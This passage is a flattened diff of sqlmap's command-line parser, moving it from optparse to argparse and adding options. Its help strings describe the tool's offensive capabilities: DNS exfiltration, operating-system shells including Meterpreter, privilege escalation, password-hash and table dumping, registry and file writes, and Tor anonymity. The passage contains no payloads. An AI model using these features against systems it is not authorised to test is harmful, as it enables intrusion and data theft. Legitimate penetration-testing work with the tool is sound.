**kwargs): + return self.add_option(*args, **kwargs) + + OptionGroup.add_argument = _add_argument + +except ImportError: + from argparse import ArgumentParser + from argparse import ArgumentError + from argparse import SUPPRESS + +finally: + def get_actions(instance): + for attr in ("option_list", "_group_actions", "_actions"): + if hasattr(instance, attr): + return getattr(instance, attr) + + def get_groups(parser): + return getattr(parser, "option_groups", None) or getattr(parser, "_action_groups") + + def get_all_options(parser): + retVal = set() + + for option in get_actions(parser): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + for group in get_groups(parser): + for option in get_actions(group): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + return retVal -from lib.core.common import checkDeprecatedOptions +from lib.core.common import checkOldOptions +from lib.core.common import checkSystemEncoding +from lib.core.common import dataToStdout from lib.core.common import expandMnemonics -from lib.core.common import getUnicode +from lib.core.common import getSafeExString +from lib.core.compat import xrange +from lib.core.convert import getUnicode +from lib.core.data import cmdLineOptions +from lib.core.data import conf from lib.core.data import logger from lib.core.defaults import defaults +from lib.core.dicts import DEPRECATED_OPTIONS +from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.exception import SqlmapShellQuitException +from lib.core.exception import SqlmapSilentQuitException +from lib.core.exception import SqlmapSyntaxException +from lib.core.option import _createHomeDirectories from lib.core.settings import BASIC_HELP_ITEMS +from lib.core.settings import DUMMY_URL +from lib.core.settings import IGNORED_OPTIONS +from lib.core.settings import INFERENCE_UNKNOWN_CHAR from lib.core.settings import IS_WIN from lib.core.settings import MAX_HELP_OPTION_LENGTH - -def cmdLineParser(): +from lib.core.settings import VERSION_STRING +from lib.core.shell import autoCompletion +from lib.core.shell import clearHistory +from lib.core.shell import loadHistory +from lib.core.shell import saveHistory +from thirdparty.six.moves import input as _input + +def cmdLineParser(argv=None): """ This function parses the command line parameters and arguments """ - usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ - "\"%s\"" % sys.argv[0] if " " in sys.argv[0] else sys.argv[0]) + if not argv: + argv = sys.argv + + checkSystemEncoding() + + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding) - parser = OptionParser(usage=usage) + usage = "%s%s [options]" % ("%s " % os.path.basename(sys.executable) if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _) + parser = ArgumentParser(usage=usage) try: - parser.add_option("--hh", dest="advancedHelp", - action="store_true", - help="Show advanced help message and exit") + parser.add_argument("--hh", dest="advancedHelp", action="store_true", + help="Show advanced help message and exit") - parser.add_option("-v", dest="verbose", type="int", - help="Verbosity level: 0-6 (default %d)" % defaults.verbose) + parser.add_argument("--version", dest="showVersion", action="store_true", + help="Show program's version number and exit") - # Target options - target = OptionGroup(parser, "Target", "At least one of these " - "options has to be specified to set the source " - "to get target urls from") + parser.add_argument("-v", dest="verbose", type=int, + help="Verbosity level: 0-6 (default %d)" % defaults.verbose) - target.add_option("-d", dest="direct", help="Direct " - "connection to the database") + # Target options + target = parser.add_argument_group("Target", "At least one of these options has to be provided to define the target(s)") - target.add_option("-u", "--url", dest="url", help="Target url") + target.add_argument("-u", "--url", dest="url", + help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")") - target.add_option("-l", dest="logFile", help="Parse targets from Burp " - "or WebScarab proxy logs") + target.add_argument("-d", dest="direct", + help="Connection string for direct database connection") - target.add_option("-m", dest="bulkFile", help="Scan multiple targets enlisted " - "in a given textual file ") + target.add_argument("-l", dest="logFile", + help="Parse target(s) from Burp or WebScarab proxy log file") - target.add_option("-r", dest="requestFile", - help="Load HTTP request from a file") + target.add_argument("-m", dest="bulkFile", + help="Scan multiple targets given in a textual file ") - target.add_option("-s", dest="sessionFile", - help="Load session from a stored (.sqlite) file") + target.add_argument("-r", dest="requestFile", + help="Load HTTP request from a file") - target.add_option("-g", dest="googleDork", - help="Process Google dork results as target urls") + target.add_argument("-g", dest="googleDork", + help="Process Google dork results as target URLs") - target.add_option("-c", dest="configFile", - help="Load options from a configuration INI file") + target.add_argument("-c", dest="configFile", + help="Load options from a configuration INI file") # Request options - request = OptionGroup(parser, "Request", "These options can be used " - "to specify how to connect to the target url") + request = parser.add_argument_group("Request", "These options can be used to specify how to connect to the target URL") + + request.add_argument("-A", "--user-agent", dest="agent", + help="HTTP User-Agent header value") + + request.add_argument("-H", "--header", dest="header", + help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")") + + request.add_argument("--method", dest="method", + help="Force usage of given HTTP method (e.g. PUT)") + + request.add_argument("--data", dest="data", + help="Data string to be sent through POST (e.g. \"id=1\")") + + request.add_argument("--param-del", dest="paramDel", + help="Character used for splitting parameter values (e.g. &)") + + request.add_argument("--cookie", dest="cookie", + help="HTTP Cookie header value (e.g. \"PHPSESSID=a8d127e..\")") + + request.add_argument("--cookie-del", dest="cookieDel", + help="Character used for splitting cookie values (e.g. ;)") - request.add_option("--data", dest="data", - help="Data string to be sent through POST") + request.add_argument("--live-cookies", dest="liveCookies", + help="Live cookies file used for loading up-to-date values") - request.add_option("--param-del", dest="pDel", - help="Character used for splitting parameter values") + request.add_argument("--load-cookies", dest="loadCookies", + help="File containing cookies in Netscape/wget format") - request.add_option("--cookie", dest="cookie", - help="HTTP Cookie header") + request.add_argument("--drop-set-cookie", dest="dropSetCookie", action="store_true", + help="Ignore Set-Cookie header from response") - request.add_option("--load-cookies", dest="loadCookies", - help="File containing cookies in Netscape/wget format") + request.add_argument("--http1.0", dest="http10", action="store_true", + help="Use HTTP version 1.0 (old)") - request.add_option("--drop-set-cookie", dest="dropSetCookie", - action="store_true", - help="Ignore Set-Cookie header from response") + request.add_argument("--http2", dest="http2", action="store_true", + help="Use HTTP version 2 (experimental)") - request.add_option("--user-agent", dest="agent", - help="HTTP User-Agent header") + request.add_argument("--mobile", dest="mobile", action="store_true", + help="Imitate smartphone through HTTP User-Agent header") - request.add_option("--random-agent", dest="randomAgent", - action="store_true", - help="Use randomly selected HTTP User-Agent header") + request.add_argument("--random-agent", dest="randomAgent", action="store_true", + help="Use randomly selected HTTP User-Agent header value") - request.add_option("--randomize", dest="rParam", - help="Randomly change value for given parameter(s)") + request.add_argument("--host", dest="host", + help="HTTP Host header value") - request.add_option("--force-ssl", dest="forceSSL", - action="store_true", - help="Force usage of SSL/HTTPS requests") + request.add_argument("--referer", dest="referer", + help="HTTP Referer header value") - request.add_option("--host", dest="host", - help="HTTP Host header") + request.add_argument("--headers", dest="headers", + help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") - request.add_option("--referer", dest="referer", - help="HTTP Referer header") + request.add_argument("--auth-type", dest="authType", + help="HTTP authentication type (Basic, Digest, Bearer, ...)") - request.add_option("--headers", dest="headers", - help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") + request.add_argument("--auth-cred", dest="authCred", + help="HTTP authentication credentials (name:password)") - request.add_option("--auth-type", dest="aType", - help="HTTP authentication type " - "(Basic, Digest or NTLM)") + request.add_argument("--auth-file", dest="authFile", + help="HTTP authentication PEM cert/private key file") - request.add_option("--auth-cred", dest="aCred", - help="HTTP authentication credentials " - "(name:password)") + request.add_argument("--abort-code", dest="abortCode", + help="Abort on (problematic) HTTP error code(s) (e.g. 401)") - request.add_option("--auth-cert", dest="aCert", - help="HTTP authentication certificate (" - "key_file,cert_file)") + request.add_argument("--ignore-code", dest="ignoreCode", + help="Ignore (problematic) HTTP error code(s) (e.g. 401)") - request.add_option("--proxy", dest="proxy", - help="Use a HTTP proxy to connect to the target url") + request.add_argument("--ignore-proxy", dest="ignoreProxy", action="store_true", + help="Ignore system default proxy settings") - request.add_option("--proxy-cred", dest="pCred", - help="HTTP proxy authentication credentials " - "(name:password)") + request.add_argument("--ignore-redirects", dest="ignoreRedirects", action="store_true", + help="Ignore redirection attempts") - request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", - help="Ignore system default HTTP proxy") + request.add_argument("--ignore-timeouts", dest="ignoreTimeouts", action="store_true", + help="Ignore connection timeouts") - request.add_option("--delay", dest="delay", type="float", - help="Delay in seconds between each HTTP request") + request.add_argument("--proxy", dest="proxy", + help="Use a proxy to connect to the target URL") - request.add_option("--timeout", dest="timeout", type="float", - help="Seconds to wait before timeout connection " - "(default %d)" % defaults.timeout) + request.add_argument("--proxy-cred", dest="proxyCred", + help="Proxy authentication credentials (name:password)") - request.add_option("--retries", dest="retries", type="int", - help="Retries when the connection timeouts " - "(default %d)" % defaults.retries) + request.add_argument("--proxy-file", dest="proxyFile", + help="Load proxy list from a file") - request.add_option("--scope", dest="scope", - help="Regexp to filter targets from provided proxy log") + request.add_argument("--proxy-freq", dest="proxyFreq", type=int, + help="Requests between change of proxy from a given list") - request.add_option("--safe-url", dest="safUrl", - help="Url address to visit frequently during testing") + request.add_argument("--tor", dest="tor", action="store_true", + help="Use Tor anonymity network") - request.add_option("--safe-freq", dest="saFreq", type="int", - help="Test requests between two visits to a given safe url") + request.add_argument("--tor-port", dest="torPort", + help="Set Tor proxy port other than default") - request.add_option("--skip-urlencode", dest="skipUrlEncode", - action="store_true", - help="Skip URL encoding of payload data") + request.add_argument("--tor-type", dest="torType", + help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") - request.add_option("--eval", dest="evalCode", - help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") + request.add_argument("--check-tor", dest="checkTor", action="store_true", + help="Check to see if Tor is used properly") + + request.add_argument("--delay", dest="delay", type=float, + help="Delay in seconds between each HTTP request") + + request.add_argument("--timeout", dest="timeout", type=float, + help="Seconds to wait before timeout connection (default %d)" % defaults.timeout) + + request.add_argument("--retries", dest="retries", type=int, + help="Retries when the connection timeouts (default %d)" % defaults.retries) + + request.add_argument("--retry-on", dest="retryOn", + help="Retry request on regexp matching content (e.g. \"drop\")") + + request.add_argument("--randomize", dest="rParam", + help="Randomly change value for given parameter(s)") + + request.add_argument("--safe-url", dest="safeUrl", + help="URL address to visit frequently during testing") + + request.add_argument("--safe-post", dest="safePost", + help="POST data to send to a safe URL") + + request.add_argument("--safe-req", dest="safeReqFile", + help="Load safe HTTP request from a file") + + request.add_argument("--safe-freq", dest="safeFreq", type=int, + help="Regular requests between visits to a safe URL") + + request.add_argument("--skip-urlencode", dest="skipUrlEncode", action="store_true", + help="Skip URL encoding of payload data") + + request.add_argument("--csrf-token", dest="csrfToken", + help="Parameter used to hold anti-CSRF token") + + request.add_argument("--csrf-url", dest="csrfUrl", + help="URL address to visit for extraction of anti-CSRF token") + + request.add_argument("--csrf-method", dest="csrfMethod", + help="HTTP method to use during anti-CSRF token page visit") + + request.add_argument("--csrf-data", dest="csrfData", + help="POST data to send during anti-CSRF token page visit") + + request.add_argument("--csrf-retries", dest="csrfRetries", type=int, + help="Retries for anti-CSRF token retrieval (default %d)" % defaults.csrfRetries) + + request.add_argument("--force-ssl", dest="forceSSL", action="store_true", + help="Force usage of SSL/HTTPS") + + request.add_argument("--chunked", dest="chunked", action="store_true", + help="Use HTTP chunked transfer encoded (POST) requests") + + request.add_argument("--hpp", dest="hpp", action="store_true", + help="Use HTTP parameter pollution method") + + request.add_argument("--eval", dest="evalCode", + help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") # Optimization options - optimization = OptionGroup(parser, "Optimization", "These " - "options can be used to optimize the " - "performance of sqlmap") + optimization = parser.add_argument_group("Optimization", "These options can be used to optimize the performance of sqlmap") - optimization.add_option("-o", dest="optimize", - action="store_true", - help="Turn on all optimization switches") + optimization.add_argument("-o", dest="optimize", action="store_true", + help="Turn on all optimization switches") - optimization.add_option("--predict-output", dest="predictOutput", action="store_true", - help="Predict common queries output") + optimization.add_argument("--predict-output", dest="predictOutput", action="store_true", + help="Predict common queries output") - optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", - help="Use persistent HTTP(s) connections") + optimization.add_argument("--keep-alive", dest="keepAlive", action="store_true", + help="Use persistent HTTP(s) connections") - optimization.add_option("--null-connection", dest="nullConnection", action="store_true", - help="Retrieve page length without actual HTTP response body") + optimization.add_argument("--null-connection", dest="nullConnection", action="store_true", + help="Retrieve page length without actual HTTP response body") - optimization.add_option("--threads", dest="threads", type="int", - help="Max number of concurrent HTTP(s) " - "requests (default %d)" % defaults.threads) + optimization.add_argument("--threads", dest="threads", type=int, + help="Max number of concurrent HTTP(s) requests (default %d)" % defaults.threads) # Injection options - injection = OptionGroup(parser, "Injection", "These options can be " - "used to specify which parameters to test " - "for, provide custom injection payloads and " - "optional tampering scripts") + injection = parser.add_argument_group("Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts") - injection.add_option("-p", dest="testParameter", - help="Testable parameter(s)") + injection.add_argument("-p", dest="testParameter", + help="Testable parameter(s)") - injection.add_option("--dbms", dest="dbms", - help="Force back-end DBMS to this value") + injection.add_argument("--skip", dest="skip", + help="Skip testing for given parameter(s)") - injection.add_option("--os", dest="os", - help="Force back-end DBMS operating system " - "to this value") + injection.add_argument("--skip-static", dest="skipStatic", action="store_true", + help="Skip testing parameters that not appear to be dynamic") - injection.add_option("--invalid-bignum", dest="invalidBignum", - action="store_true", - help="Use big numbers for invalidating values") + injection.add_argument("--param-exclude", dest="paramExclude", + help="Regexp to exclude parameters from testing (e.g. \"ses\")") - injection.add_option("--invalid-logical", dest="invalidLogical", - action="store_true", - help="Use logical operations for invalidating values") + injection.add_argument("--param-filter", dest="paramFilter", + help="Select testable parameter(s) by place (e.g. \"POST\")") - injection.add_option("--no-cast", dest="noCast", - action="store_true", - help="Turn off payload casting mechanism") + injection.add_argument("--dbms", dest="dbms", + help="Force back-end DBMS to provided value") - injection.add_option("--no-escape", dest="noEscape", - action="store_true", - help="Turn off string escaping mechanism") + injection.add_argument("--dbms-cred", dest="dbmsCred", + help="DBMS authentication credentials (user:password)") - injection.add_option("--prefix", dest="prefix", - help="Injection payload prefix string") + injection.add_argument("--os", dest="os", + help="Force back-end DBMS operating system to provided value") - injection.add_option("--suffix", dest="suffix", - help="Injection payload suffix string") + injection.add_argument("--invalid-bignum", dest="invalidBignum", action="store_true", + help="Use big numbers for invalidating values") - injection.add_option("--skip", dest="skip", - help="Skip testing for given parameter(s)") + injection.add_argument("--invalid-logical", dest="invalidLogical", action="store_true", + help="Use logical operations for invalidating values") - injection.add_option("--tamper", dest="tamper", - help="Use given script(s) for tampering injection data") + injection.add_argument("--invalid-string", dest="invalidString", action="store_true", + help="Use random strings for invalidating values") + + injection.add_argument("--no-cast", dest="noCast", action="store_true", + help="Turn off payload casting mechanism") + + injection.add_argument("--no-escape", dest="noEscape", action="store_true", + help="Turn off string escaping mechanism") + + injection.add_argument("--prefix", dest="prefix", + help="Injection payload prefix string") + + injection.add_argument("--suffix", dest="suffix", + help="Injection payload suffix string") + + injection.add_argument("--tamper", dest="tamper", + help="Use given script(s) for tampering injection data") # Detection options - detection = OptionGroup(parser, "Detection", "These options can be " - "used to specify how to parse " - "and compare page content from " - "HTTP responses when using blind SQL " - "injection technique") + detection = parser.add_argument_group("Detection", "These options can be used to customize the detection phase") + + detection.add_argument("--level", dest="level", type=int, + help="Level of tests to perform (1-5, default %d)" % defaults.level) - detection.add_option("--level", dest="level", type="int", - help="Level of tests to perform (1-5, " - "default %d)" % defaults.level) + detection.add_argument("--risk", dest="risk", type=int, + help="Risk of tests to perform (1-3, default %d)" % defaults.risk) - detection.add_option("--risk", dest="risk", type="int", - help="Risk of tests to perform (0-3, " - "default %d)" % defaults.level) + detection.add_argument("--string", dest="string", + help="String to match when query is evaluated to True") - detection.add_option("--string", dest="string", - help="String to match when " - "query is evaluated to True") + detection.add_argument("--not-string", dest="notString", + help="String to match when query is evaluated to False") - detection.add_option("--not-string", dest="notString", - help="String to match when " - "query is evaluated to False") + detection.add_argument("--regexp", dest="regexp", + help="Regexp to match when query is evaluated to True") - detection.add_option("--regexp", dest="regexp", - help="Regexp to match when " - "query is evaluated to True") + detection.add_argument("--code", dest="code", type=int, + help="HTTP code to match when query is evaluated to True") - detection.add_option("--code", dest="code", type="int", - help="HTTP code to match when " - "query is evaluated to True") + detection.add_argument("--smart", dest="smart", action="store_true", + help="Perform thorough tests only if positive heuristic(s)") - detection.add_option("--text-only", dest="textOnly", - action="store_true", - help="Compare pages based only on the textual content") + detection.add_argument("--text-only", dest="textOnly", action="store_true", + help="Compare pages based only on the textual content") - detection.add_option("--titles", dest="titles", - action="store_true", - help="Compare pages based only on their titles") + detection.add_argument("--titles", dest="titles", action="store_true", + help="Compare pages based only on their titles") # Techniques options - techniques = OptionGroup(parser, "Techniques", "These options can be " - "used to tweak testing of specific SQL " - "injection techniques") + techniques = parser.add_argument_group("Techniques", "These options can be used to tweak testing of specific SQL injection techniques") - techniques.add_option("--technique", dest="tech", - help="SQL injection techniques to test for " - "(default \"%s\")" % defaults.tech) + techniques.add_argument("--technique", dest="technique", + help="SQL injection techniques to use (default \"%s\")" % defaults.technique) - techniques.add_option("--time-sec", dest="timeSec", - type="int", - help="Seconds to delay the DBMS response " - "(default %d)" % defaults.timeSec) + techniques.add_argument("--time-sec", dest="timeSec", type=int, + help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec) - techniques.add_option("--union-cols", dest="uCols", - help="Range of columns to test for UNION query SQL injection") + techniques.add_argument("--disable-stats", dest="disableStats", action="store_true", + help="Disable the statistical model for detecting the delay") - techniques.add_option("--union-char", dest="uChar", - help="Character to use for bruteforcing number of columns") + techniques.add_argument("--union-cols", dest="uCols", + help="Range of columns to test for UNION query SQL injection") - techniques.add_option("--dns-domain", dest="dnsName", - help="Domain name used for DNS exfiltration attack") + techniques.add_argument("--union-char", dest="uChar", + help="Character to use for bruteforcing number of columns") - techniques.add_option("--second-order", dest="secondOrder", - help="Resulting page url searched for second-order " - "response") + techniques.add_argument("--union-from", dest="uFrom", + help="Table to use in FROM part of UNION query SQL injection") + + techniques.add_argument("--union-values", dest="uValues", + help="Column values to use for UNION query SQL injection") + + techniques.add_argument("--dns-domain", dest="dnsDomain", + help="Domain name used for DNS exfiltration attack") + + techniques.add_argument("--second-url", dest="secondUrl", + help="Resulting page URL searched for second-order response") + + techniques.add_argument("--second-req", dest="secondReq", + help="Load second-order HTTP request from file") # Fingerprint options - fingerprint = OptionGroup(parser, "Fingerprint") + fingerprint = parser.add_argument_group("Fingerprint") - fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", - action="store_true", - help="Perform an extensive DBMS version fingerprint") + fingerprint.add_argument("-f", "--fingerprint", dest="extensiveFp", action="store_true", + help="Perform an extensive DBMS version fingerprint") # Enumeration options - enumeration = OptionGroup(parser, "Enumeration", "These options can " - "be used to enumerate the back-end database " - "management system information, structure " - "and data contained in the tables. Moreover " - "you can run your own SQL statements") + enumeration = parser.add_argument_group("Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables") - enumeration.add_option("-a", "--all", dest="getAll", - action="store_true", help="Retrieve everything") + enumeration.add_argument("-a", "--all", dest="getAll", action="store_true", + help="Retrieve everything") - enumeration.add_option("-b", "--banner", dest="getBanner", - action="store_true", help="Retrieve DBMS banner") + enumeration.add_argument("-b", "--banner", dest="getBanner", action="store_true", + help="Retrieve DBMS banner") - enumeration.add_option("--current-user", dest="getCurrentUser", - action="store_true", - help="Retrieve DBMS current user") + enumeration.add_argument("--current-user", dest="getCurrentUser", action="store_true", + help="Retrieve DBMS current user") - enumeration.add_option("--current-db", dest="getCurrentDb", - action="store_true", - help="Retrieve DBMS current database") + enumeration.add_argument("--current-db", dest="getCurrentDb", action="store_true", + help="Retrieve DBMS current database") - enumeration.add_option("--hostname", dest="getHostname", - action="store_true", - help="Retrieve DBMS server hostname") + enumeration.add_argument("--hostname", dest="getHostname", action="store_true", + help="Retrieve DBMS server hostname") - enumeration.add_option("--is-dba", dest="isDba", - action="store_true", - help="Detect if the DBMS current user is DBA") + enumeration.add_argument("--is-dba", dest="isDba", action="store_true", + help="Detect if the DBMS current user is DBA") - enumeration.add_option("--users", dest="getUsers", action="store_true", - help="Enumerate DBMS users") + enumeration.add_argument("--users", dest="getUsers", action="store_true", + help="Enumerate DBMS users") - enumeration.add_option("--passwords", dest="getPasswordHashes", - action="store_true", - help="Enumerate DBMS users password hashes") + enumeration.add_argument("--passwords", dest="getPasswordHashes", action="store_true", + help="Enumerate DBMS users password hashes") - enumeration.add_option("--privileges", dest="getPrivileges", - action="store_true", - help="Enumerate DBMS users privileges") + enumeration.add_argument("--privileges", dest="getPrivileges", action="store_true", + help="Enumerate DBMS users privileges") - enumeration.add_option("--roles", dest="getRoles", - action="store_true", - help="Enumerate DBMS users roles") + enumeration.add_argument("--roles", dest="getRoles", action="store_true", + help="Enumerate DBMS users roles") - enumeration.add_option("--dbs", dest="getDbs", action="store_true", - help="Enumerate DBMS databases") + enumeration.add_argument("--dbs", dest="getDbs", action="store_true", + help="Enumerate DBMS databases") - enumeration.add_option("--tables", dest="getTables", action="store_true", - help="Enumerate DBMS database tables") + enumeration.add_argument("--tables", dest="getTables", action="store_true", + help="Enumerate DBMS database tables") - enumeration.add_option("--columns", dest="getColumns", action="store_true", - help="Enumerate DBMS database table columns") + enumeration.add_argument("--columns", dest="getColumns", action="store_true", + help="Enumerate DBMS database table columns") - enumeration.add_option("--schema", dest="getSchema", action="store_true", - help="Enumerate DBMS schema") + enumeration.add_argument("--schema", dest="getSchema", action="store_true", + help="Enumerate DBMS schema") - enumeration.add_option("--count", dest="getCount", action="store_true", - help="Retrieve number of entries for table(s)") + enumeration.add_argument("--count", dest="getCount", action="store_true", + help="Retrieve number of entries for table(s)") - enumeration.add_option("--dump", dest="dumpTable", action="store_true", - help="Dump DBMS database table entries") + enumeration.add_argument("--dump", dest="dumpTable", action="store_true", + help="Dump DBMS database table entries") - enumeration.add_option("--dump-all", dest="dumpAll", action="store_true", - help="Dump all DBMS databases tables entries") + enumeration.add_argument("--dump-all", dest="dumpAll", action="store_true", + help="Dump all DBMS databases tables entries") - enumeration.add_option("--search", dest="search", action="store_true", - help="Search column(s), table(s) and/or database name(s)") + enumeration.add_argument("--search", dest="search", action="store_true", + help="Search column(s), table(s) and/or database name(s)") - enumeration.add_option("-D", dest="db", - help="DBMS database to enumerate") + enumeration.add_argument("--comments", dest="getComments", action="store_true", + help="Check for DBMS comments during enumeration") - enumeration.add_option("-T", dest="tbl", - help="DBMS database table to enumerate") + enumeration.add_argument("--statements", dest="getStatements", action="store_true", + help="Retrieve SQL statements being run on DBMS") - enumeration.add_option("-C", dest="col", - help="DBMS database table column to enumerate") + enumeration.add_argument("-D", dest="db", + help="DBMS database to enumerate") - enumeration.add_option("-U", dest="user", - help="DBMS user to enumerate") + enumeration.add_argument("-T", dest="tbl", + help="DBMS database table(s) to enumerate") - enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", - action="store_true", - help="Exclude DBMS system databases when " - "enumerating tables") + enumeration.add_argument("-C", dest="col", + help="DBMS database table column(s) to enumerate") - enumeration.add_option("--start", dest="limitStart", type="int", - help="First query output entry to retrieve") + enumeration.add_argument("-X", dest="exclude", + help="DBMS database identifier(s) to not enumerate") - enumeration.add_option("--stop", dest="limitStop", type="int", - help="Last query output entry to retrieve") + enumeration.add_argument("-U", dest="user", + help="DBMS user to enumerate") - enumeration.add_option("--first", dest="firstChar", type="int", - help="First query output word character to retrieve") + enumeration.add_argument("--exclude-sysdbs", dest="excludeSysDbs", action="store_true", + help="Exclude DBMS system databases when enumerating tables") - enumeration.add_option("--last", dest="lastChar", type="int", - help="Last query output word character to retrieve") + enumeration.add_argument("--pivot-column", dest="pivotColumn", + help="Pivot column name") - enumeration.add_option("--sql-query", dest="query", - help="SQL statement to be executed") + enumeration.add_argument("--where", dest="dumpWhere", + help="Use WHERE condition while table dumping") - enumeration.add_option("--sql-shell", dest="sqlShell", - action="store_true", - help="Prompt for an interactive SQL shell") + enumeration.add_argument("--start", dest="limitStart", type=int, + help="First dump table entry to retrieve") - enumeration.add_option("--sql-file", dest="sqlFile", - help="Execute SQL statements from given file(s)") + enumeration.add_argument("--stop", dest="limitStop", type=int, + help="Last dump table entry to retrieve") - # User-defined function options - brute = OptionGroup(parser, "Brute force", "These " - "options can be used to run brute force " - "checks") + enumeration.add_argument("--first", dest="firstChar", type=int, + help="First query output word character to retrieve") + + enumeration.add_argument("--last", dest="lastChar", type=int, + help="Last query output word character to retrieve") + + enumeration.add_argument("--sql-query", dest="sqlQuery", + help="SQL statement to be executed") - brute.add_option("--common-tables", dest="commonTables", action="store_true", - help="Check existence of common tables") + enumeration.add_argument("--sql-shell", dest="sqlShell", action="store_true", + help="Prompt for an interactive SQL shell") - brute.add_option("--common-columns", dest="commonColumns", action="store_true", - help="Check existence of common columns") + enumeration.add_argument("--sql-file", dest="sqlFile", + help="Execute SQL statements from given file(s)") + + # Brute force options + brute = parser.add_argument_group("Brute force", "These options can be used to run brute force checks") + + brute.add_argument("--common-tables", dest="commonTables", action="store_true", + help="Check existence of common tables") + + brute.add_argument("--common-columns", dest="commonColumns", action="store_true", + help="Check existence of common columns") + + brute.add_argument("--common-files", dest="commonFiles", action="store_true", + help="Check existence of common files") # User-defined function options - udf = OptionGroup(parser, "User-defined function injection", "These " - "options can be used to create custom user-defined " - "functions") + udf = parser.add_argument_group("User-defined function injection", "These options can be used to create custom user-defined functions") - udf.add_option("--udf-inject", dest="udfInject", action="store_true", - help="Inject custom user-defined functions") + udf.add_argument("--udf-inject", dest="udfInject", action="store_true", + help="Inject custom user-defined functions") - udf.add_option("--shared-lib", dest="shLib", - help="Local path of the shared library") + udf.add_argument("--shared-lib", dest="shLib", + help="Local path of the shared library") # File system options - filesystem = OptionGroup(parser, "File system access", "These options " - "can be used to access the back-end database " - "management system underlying file system") + filesystem = parser.add_argument_group("File system access", "These options can be used to access the back-end database management system underlying file system") - filesystem.add_option("--file-read", dest="rFile", - help="Read a file from the back-end DBMS " - "file system") + filesystem.add_argument("--file-read", dest="fileRead", + help="Read a file from the back-end DBMS file system") - filesystem.add_option("--file-write", dest="wFile", - help="Write a local file on the back-end " - "DBMS file system") + filesystem.add_argument("--file-write", dest="fileWrite", + help="Write a local file on the back-end DBMS file system") - filesystem.add_option("--file-dest", dest="dFile", - help="Back-end DBMS absolute filepath to " - "write to") + filesystem.add_argument("--file-dest", dest="fileDest", + help="Back-end DBMS absolute filepath to write to") # Takeover options - takeover = OptionGroup(parser, "Operating system access", "These " - "options can be used to access the back-end " - "database management system underlying " - "operating system") - - takeover.add_option("--os-cmd", dest="osCmd", - help="Execute an operating system command") - - takeover.add_option("--os-shell", dest="osShell", - action="store_true", - help="Prompt for an interactive operating " - "system shell") - - takeover.add_option("--os-pwn", dest="osPwn", - action="store_true", - help="Prompt for an out-of-band shell, " - "meterpreter or VNC") - - takeover.add_option("--os-smbrelay", dest="osSmb", - action="store_true", - help="One click prompt for an OOB shell, " - "meterpreter or VNC") - - takeover.add_option("--os-bof", dest="osBof", - action="store_true", - help="Stored procedure buffer overflow " + takeover = parser.add_argument_group("Operating system access", "These options can be used to access the back-end database management system underlying operating system") + + takeover.add_argument("--os-cmd", dest="osCmd", + help="Execute an operating system command") + + takeover.add_argument("--os-shell", dest="osShell", action="store_true", + help="Prompt for an interactive operating system shell") + + takeover.add_argument("--os-pwn", dest="osPwn", action="store_true", + help="Prompt for an OOB shell, Meterpreter or VNC") + + takeover.add_argument("--os-smbrelay", dest="osSmb", action="store_true", + help="One click prompt for an OOB shell, Meterpreter or VNC") + + takeover.add_argument("--os-bof", dest="osBof", action="store_true", + help="Stored procedure buffer overflow " "exploitation") - takeover.add_option("--priv-esc", dest="privEsc", - action="store_true", - help="Database process' user privilege escalation") + takeover.add_argument("--priv-esc", dest="privEsc", action="store_true", + help="Database process user privilege escalation") - takeover.add_option("--msf-path", dest="msfPath", - help="Local path where Metasploit Framework " - "is installed") + takeover.add_argument("--msf-path", dest="msfPath", + help="Local path where Metasploit Framework is installed") - takeover.add_option("--tmp-path", dest="tmpPath", - help="Remote absolute path of temporary files " - "directory") + takeover.add_argument("--tmp-path", dest="tmpPath", + help="Remote absolute path of temporary files directory") # Windows registry options - windows = OptionGroup(parser, "Windows registry access", "These " - "options can be used to access the back-end " - "database management system Windows " - "registry") + windows = parser.add_argument_group("Windows registry access", "These options can be used to access the back-end database management system Windows registry") - windows.add_option("--reg-read", dest="regRead", - action="store_true", - help="Read a Windows registry key value") + windows.add_argument("--reg-read", dest="regRead", action="store_true", + help="Read a Windows registry key value") - windows.add_option("--reg-add", dest="regAdd", - action="store_true", - help="Write a Windows registry key value data") + windows.add_argument("--reg-add", dest="regAdd", action="store_true", + help="Write a Windows registry key value data") - windows.add_option("--reg-del", dest="regDel", - action="store_true", - help="Delete a Windows registry key value") + windows.add_argument("--reg-del", dest="regDel", action="store_true", + help="Delete a Windows registry key value") - windows.add_option("--reg-key", dest="regKey", - help="Windows registry key") + windows.add_argument("--reg-key", dest="regKey", + help="Windows registry key") - windows.add_option("--reg-value", dest="regVal", - help="Windows registry key value") + windows.add_argument("--reg-value", dest="regVal", + help="Windows registry key value") - windows.add_option("--reg-data", dest="regData", - help="Windows registry key value data") + windows.add_argument("--reg-data", dest="regData", + help="Windows registry key value data") - windows.add_option("--reg-type", dest="regType", - help="Windows registry key value type") + windows.add_argument("--reg-type", dest="regType", + help="Windows registry key value type") # General options - general = OptionGroup(parser, "General", "These options can be used " - "to set some general working parameters") + general = parser.add_argument_group("General", "These options can be used to set some general working parameters") + + general.add_argument("-s", dest="sessionFile", + help="Load session from a stored (.sqlite) file") + + 